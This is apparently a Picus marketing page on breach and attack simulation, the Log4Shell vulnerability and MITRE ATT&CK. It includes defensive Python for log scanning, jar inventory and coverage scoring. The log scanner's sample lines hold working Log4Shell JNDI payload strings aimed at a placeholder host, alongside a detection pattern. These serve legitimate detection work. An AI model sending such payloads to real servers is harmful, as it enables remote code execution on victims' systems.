The Complete Security Validation Platform

The Picus Security Control Validation Platform is a Breach and Attack Simulation (BAS) solution that helps you measure and strengthen cyber resilience by automatically and continuously testing the effectiveness of your prevention and detection tools.


How can You Benefit from the Most Complete Security Control Validation Platform?

Test your Security Controls 24/7

Picus identifies threat prevention and detection weaknesses by assessing the effectiveness of your security tools on an ongoing basis (and on-demand).

Validate Readiness Against The Latest Threats

With a rich threat library, updated daily by offensive security experts, Picus tests your defenses against current and emerging attack techniques.

Optimize Prevention & Detection Capabilities

To achieve optimal protection from your network and endpoint security tools, Picus supplies easy-to-apply signatures and detection rules.

Show the Value of your Investments

Supplying real-time metrics, including an overall security score for your organization, Picus helps you to measure performance and prove value.

Operationalize MITRE ATT&CK

Picus maps assessment results to the MITRE ATT&CK framework, enabling you to visualize threat coverage and prioritize mitigation of gaps.

Improve SOC Efficiency and Effectiveness

Picus automates manual assessment and engineering processes to reduce fatigue and help your security teams work together more collaboratively.

Download White Papers and Reports to learn more about the Picus Security Validation Platform

Download the BAS White Paper to learn more


What is Breach and Attack Simulation?

According to Gartner, “Breach and Attack Simulation technologies address a variety of use cases for security and risk management teams.”

Read this Gartner report, ‘What Are the Top Use Cases for Breach and Attack Simulation Technology?’, to learn about the key ways BAS can measure and strengthen your organization’s cyber resilience.

Also discover:

  • Defining features of a BAS tool
  • Important questions that BAS can answer about your security
  • How BAS compares to pen testing and vulnerability scanning

Access the Gartner Report


See how the Picus Security Validation Platform tests your security controls against Log4Shell exploits, and how to operationalize the MITRE ATT&CK framework in your SOC.

What is the Log4Shell Vulnerability?

Apache Log4j is a widely used Java logging framework found in many commercial and open-source software products. CVE-2021-44228 is a remote code execution (RCE) vulnerability in Log4j that can be exploited without authentication. Its criticality is rated 10 out of 10 in the Common Vulnerability Scoring System (CVSS).

The vulnerability exists because of the way Log4j handles log messages. Apache Log4j2 versions 2.0 through 2.14.1 do not protect against attacker-controlled LDAP (Lightweight Directory Access Protocol) and other JNDI (Java Naming and Directory Interface) endpoints referenced from a log message. If an attacker sends a specially crafted message that gets logged, Log4j may load an external class and execute its code (RCE).
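Because the trigger is any attacker-controlled string that reaches a log call, a first detection step is to scan logs for JNDI lookup syntax. The detector below is an added example (not Picus code); it runs over constructed web-server log lines and collapses the simple nested lookups that are often used to hide the literal `jndi` token, which is why a naive substring match misses them.

```python
import re

# Constructed sample access-log lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "-"',
]

# Nested lookups that resolve to a single literal: ${lower:x}, ${upper:x}, ${::-x}.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}$]+)\}|\$\{::-([^}$]+)\}", re.IGNORECASE)

# A JNDI lookup followed by one of the provider schemes Log4j can resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(text: str, rounds: int = 5) -> str:
    """Collapse nested lookups so '${${lower:j}ndi:' becomes '${jndi:'.

    A bounded number of rounds handles lookups nested a few levels deep
    without looping forever on pathological input.
    """
    for _ in range(rounds):
        new = _NESTED.sub(lambda m: m.group(1) or m.group(2), text)
        if new == text:
            break
        text = new
    return text.lower()


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indexes of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"suspicious line {i}: {SAMPLE_LOGS[i]}")
```

A hit in an access log means the string was received, not that it was logged by a vulnerable Log4j instance; correlate with outbound LDAP/RMI connections from the application host to confirm exploitation.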

What are the four steps for immediate mitigation of Log4j attacks?

It seems that we will be talking about Log4j for weeks, maybe months to come. Even though a patch for the first Log4j vulnerability (CVE-2021-44228) was released on December 10th, another Log4j vulnerability (CVE-2021-45046) was found on December 14th, 2021.

  1. Secure public-facing critical assets first
  2. Validate network security controls
  3. Utilize your network security controls
  4. Keep your assets up-to-date but continue to simulate attacks and harden your perimeter security
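Steps 1 and 4 both start from knowing which assets carry an affected log4j-core. The inventory script below is an added example (not Picus tooling): it reads the version that Maven records inside each jar and flags it against the 2.0 through 2.14.1 range the page gives for CVE-2021-44228. The sample jars are constructed fixtures; 2.99.0 is a placeholder version outside the range, not a real release.

```python
import os
import re
import tempfile
import zipfile

# Affected range for CVE-2021-44228 as stated on this page (log4j-core 2.0 through 2.14.1).
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)

# Maven writes this file into every log4j-core jar; it carries the artifact version.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(v: str):
    """'2.14.1' -> (2, 14, 1); missing components default to 0, pre-release tags are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", v)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected(version: str) -> bool:
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def log4j_core_version(jar_path: str):
    """Version recorded in the jar's pom.properties, or None if it is not log4j-core."""
    with zipfile.ZipFile(jar_path) as z:
        if POM_PROPS not in z.namelist():
            return None
        for line in z.read(POM_PROPS).decode().splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def scan_directory(directory: str) -> dict:
    """Map each log4j-core jar name under directory to (version, affected?)."""
    findings = {}
    for root, _, files in os.walk(directory):
        for name in files:
            if name.endswith(".jar"):
                version = log4j_core_version(os.path.join(root, name))
                if version is not None:
                    findings[name] = (version, is_affected(version))
    return findings


def make_sample_jar(directory: str, name: str, version: str = None) -> str:
    """Constructed fixture: a minimal jar; with a version it mimics log4j-core, without one a plain app jar."""
    path = os.path.join(directory, name)
    with zipfile.ZipFile(path, "w") as z:
        if version is not None:
            z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        else:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return path


def demo() -> dict:
    with tempfile.TemporaryDirectory() as d:
        make_sample_jar(d, "log4j-core-2.14.1.jar", "2.14.1")
        make_sample_jar(d, "log4j-core-2.99.0.jar", "2.99.0")  # placeholder version outside the range
        make_sample_jar(d, "app.jar")
        return scan_directory(d)
```

The range encoded here is only the one this page states for CVE-2021-44228; CVE-2021-45046 needs its own range added, and jars bundled inside other jars (fat jars, WAR files) need a recursive unpack that this example does not do.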

TEST YOUR SECURITY CONTROLS TO PREVENT LOG4SHELL EXPLOITS WITH PICUS

  • Simulate Log4Shell exploits
  • Test your WAF, IPS, and NGFW against Log4j attacks
  • Uncover gaps in your security controls
  • Enable provided prevention signatures to fix gaps
  • Secure your network against Log4j attacks
  • Continuously validate your security controls and Log4j resilience

Operationalizing the MITRE ATT&CK Framework for Security Operations Centers (SOCs)

The MITRE ATT&CK Framework is a globally accessible public knowledge base built from real-world observations of adversary operations.

MITRE ATT&CK systematically defines and organizes Tactics, Techniques, and Procedures (TTPs), and has become a common language security teams use to describe them. Another important aspect of MITRE ATT&CK is that it is community-driven: the whole global security community can contribute to it, which is what makes it such a compelling framework. Finally, the framework is not static; it expands as new techniques and tactics are observed.

This video includes the first section of the Operationalizing the MITRE ATT&CK Framework for Security Operations Centers (SOCs) Course of Purple Academy by Picus. It is a micro-course designed for busy professionals. These courses are short (around 1 hour), focused on a particular topic, accessible 24/7, and offered in a convenient, self-paced format. Students who complete a course receive a verifiable badge and certificate.

In the MITRE ATT&CK Matrix for Enterprise, each column represents a tactic (the adversary’s technical goal). To achieve these goals, adversaries use different methods, which are called MITRE ATT&CK techniques. For each technique and sub-technique, MITRE ATT&CK provides valuable information to help security teams, such as metadata, procedure examples, mitigations, and detection guidance.

MITRE ATT&CK also catalogues threat groups associated with intrusion activity, as well as the software those groups use. Briefly, over the life cycle of a cyber attack, a threat group uses techniques or sub-techniques, manually or via software, to accomplish its goals (tactics).

Let’s focus on how MITRE ATT&CK can be operationalized. MITRE suggests four use cases. The first is ‘Threat Intelligence’: using ATT&CK as a threat intel source. The second is ‘Adversary Emulation’: using ATT&CK to assess your defenses, including red teaming. The third is ‘Gap Analysis’: using ATT&CK to identify defensive gaps. The fourth is ‘Detection & Analytics’: addressing the identified defensive gaps.
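The ‘Adversary Emulation’ and ‘Gap Analysis’ use cases meet when simulation results are mapped back onto ATT&CK, which is what the platform described above does. The code below is an added example (not Picus code) of that mapping: it takes constructed simulation results, reduces them to a worst-case status per technique, reports coverage per tactic, lists untested techniques, and computes a single score. The technique IDs and names are real ATT&CK entries; the catalogue subset, the tactic ordering used for prioritization, and the scoring weights (prevented 1.0, detected only 0.5, gap 0) are assumptions for the example.

```python
from collections import defaultdict

# Real ATT&CK technique IDs and names; an illustrative subset, not the full matrix.
CATALOGUE = {
    "T1190": ("Initial Access", "Exploit Public-Facing Application"),
    "T1059.001": ("Execution", "PowerShell"),
    "T1003.001": ("Credential Access", "LSASS Memory"),
    "T1021.002": ("Lateral Movement", "SMB/Windows Admin Shares"),
    "T1041": ("Exfiltration", "Exfiltration Over C2 Channel"),
}
# Assumed priority: tactics earlier in the attack life cycle are fixed first.
TACTIC_ORDER = ["Initial Access", "Execution", "Credential Access", "Lateral Movement", "Exfiltration"]
RANK = {"prevented": 0, "detected": 1, "gap": 2}     # higher rank = worse outcome
WEIGHT = {"prevented": 1.0, "detected": 0.5, "gap": 0.0}  # assumed scoring weights

# Constructed simulation results: one record per simulated action (a technique may have several variants).
RESULTS = [
    {"technique": "T1190", "prevented": True, "detected": True},
    {"technique": "T1059.001", "prevented": False, "detected": True},
    {"technique": "T1059.001", "prevented": False, "detected": False},  # a second variant slipped through
    {"technique": "T1003.001", "prevented": False, "detected": False},
    {"technique": "T1021.002", "prevented": False, "detected": True},
]


def technique_status(results) -> dict:
    """Worst-case status per technique: one unprevented, undetected variant makes it a gap."""
    status = {}
    for r in results:
        s = "prevented" if r["prevented"] else ("detected" if r["detected"] else "gap")
        tid = r["technique"]
        if tid not in status or RANK[s] > RANK[status[tid]]:
            status[tid] = s
    return status


def tactic_coverage(status, catalogue=CATALOGUE) -> dict:
    """Share of tested techniques per tactic that were prevented or at least detected."""
    per = defaultdict(lambda: [0, 0])  # tactic -> [covered, tested]
    for tid, s in status.items():
        tactic = catalogue[tid][0]
        per[tactic][1] += 1
        per[tactic][0] += s != "gap"
    return {t: round(c / n, 2) for t, (c, n) in per.items()}


def untested(status, catalogue=CATALOGUE) -> list:
    """Catalogue techniques with no simulation data at all: blind spots, not measured gaps."""
    return sorted(set(catalogue) - set(status))


def prioritized_gaps(status, catalogue=CATALOGUE) -> list:
    """Gap techniques ordered by the tactic's position in the attack life cycle."""
    gaps = [tid for tid, s in status.items() if s == "gap"]
    return sorted(gaps, key=lambda tid: TACTIC_ORDER.index(catalogue[tid][0]))


def security_score(status) -> float:
    """0-100 score over tested techniques using the assumed weights."""
    return round(100 * sum(WEIGHT[s] for s in status.values()) / len(status), 1)
```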

In order to learn how to operationalize MITRE ATT&CK via the four use cases for red teams, blue teams, and purple teams, you can visit the ‘Operationalizing MITRE ATT&CK for SOCs’ course in Purple Academy, which is a give-back project of Picus Security to provide open-access (free) cybersecurity courses to the community. Students who complete the course receive a verifiable certificate as recognition of their efforts. They also earn Continuing Professional Education (CPE) credits.

Contact Us

1003 Bukit Merah Central, #07-04 Inno Centre, Singapore 159836
